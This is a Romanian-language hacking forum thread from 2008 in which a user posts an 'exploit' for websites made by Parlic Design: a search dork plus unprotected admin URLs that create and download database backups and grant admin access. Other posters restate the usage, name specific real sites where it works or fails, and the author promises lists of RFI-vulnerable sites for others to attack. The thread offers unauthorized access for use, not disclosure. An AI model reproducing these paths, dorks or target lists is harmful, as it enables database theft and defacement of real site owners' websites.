paxnWo Posted October 25, 2008 Report Posted October 25, 2008 ###################### Discovered by: paxnwo # Mail: paxnwo@yahoo.com # 26.oct.2008 #####################(x)------------------------------------------------------------------------------------(x)~| D0rk: design and developed by Parlic Design~| Exploit1: /admin/backup/backup.php <!-- creates a backup of the db and provides you its name. eg : 26-10-2008 01-35.sql -->~| Exploit2: /admin/backup/dump/db-backup-name.sql ~| Usage: www.site.com/admin/backup/dump/26-10-2008 01-35.sql~| Exploit3: /admin/backup/list.php<!-- lists the avaible backups. you are now loged in as admin; you can change the content -->(x)------------------------------------------------------------------------------------(x)nu e mare lucru puteam sa postez la show-off toate site-urile create de Parlic Design si vai ce mare hacker sunt eu ca sa studiati contentul /admin/ , am gasit un site tot de la Parlic Design care nu e protejat: Index of /admin .pe langa faptul ca puteti sa puneti mana pe baza lor de date, pe unele merge sa si modificati contentul . jucati-va si o sa mearga . Quote
xZu Posted October 25, 2008 Report Posted October 25, 2008 hhh, am gasit si eu acelas lucru...nu sunt sigur daca inaintea ta...oricum nu conteaza http://rstcenter.com/forum/12558-scvladimirci-org.rstedit: good work Quote
paxnWo Posted October 26, 2008 Author Report Posted October 26, 2008 am mai adaugat exploit3 ... astia dau bani frumosi, cred, ca sa aiba un site ... dar care e buguit Quote
nsilviu Posted November 25, 2008 Report Posted November 25, 2008 Spunetimi si mie pls cum il folositi acest cod de mai sus unde il puneti pe localhost? sau undeva si cum faceti cu el ? pls Quote
a13x4nd7u Posted November 25, 2008 Report Posted November 25, 2008 Daca gasesti un site de la Parlic Design poti folosi exploiturile lui paxnWo.Usage exploit1: www.site.com/admin/backup/backup.phpUsage exploit2: www.site.com/admin/backup/dump/26-10-2008 01-35.sqlUsage exploit3: www.site.com/admin/backup/list.phpBravo paxnWo! Quote
nsilviu Posted November 25, 2008 Report Posted November 25, 2008 Multumesc forte mult tot asa il probisem si yo dar nu merge pe toate site-urile si am crezut ca nu fac bine multumesc si lui a13x4nd7u ca a explicat ....De mentionat: Merge dar nu pe toate de ex: http://www.buldog-klub.si dar si merge pe altele ca de ex: http://www.liderdirektor.com/ Bravo paxnWo daca mai ai mai posteaza Quote
paxnWo Posted November 25, 2008 Author Report Posted November 25, 2008 thanks o sa incep sa postez site-uri vulnerabile rfi . va dau lista , voi va jucati Quote
Vlachs Posted November 26, 2008 Report Posted November 26, 2008 (edited) bravo pax vad ca incepi sa te impliciedited: <title>Untitled Document</title>astea sunt cica pagini php Edited November 26, 2008 by Vlachs :)) Quote
